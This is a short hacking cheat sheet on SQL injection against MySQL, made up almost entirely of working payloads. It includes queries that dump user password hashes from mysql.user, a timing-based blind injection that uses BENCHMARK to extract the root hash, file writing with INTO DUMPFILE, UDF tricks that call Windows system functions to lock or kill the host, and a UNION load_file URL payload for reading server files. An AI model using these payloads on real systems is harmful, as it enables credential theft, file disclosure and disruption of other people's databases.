====== Hacking - SQL Injection - MySQL - Users ======
===== Users =====
SELECT User,Password FROM mysql.user;
SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
Write query into a new file (can not modify existing files):
SELECT ... INTO DUMPFILE
----
===== UDF (User-Defined Functions) =====
create function LockWorkStation returns integer soname 'user32';
select LockWorkStation();
create function ExitProcess returns integer soname 'kernel32';
select exitprocess();
SELECT USER();
SELECT password,USER() FROM mysql.user;
----
===== First byte of admin hash =====
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
----
===== Read File =====
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1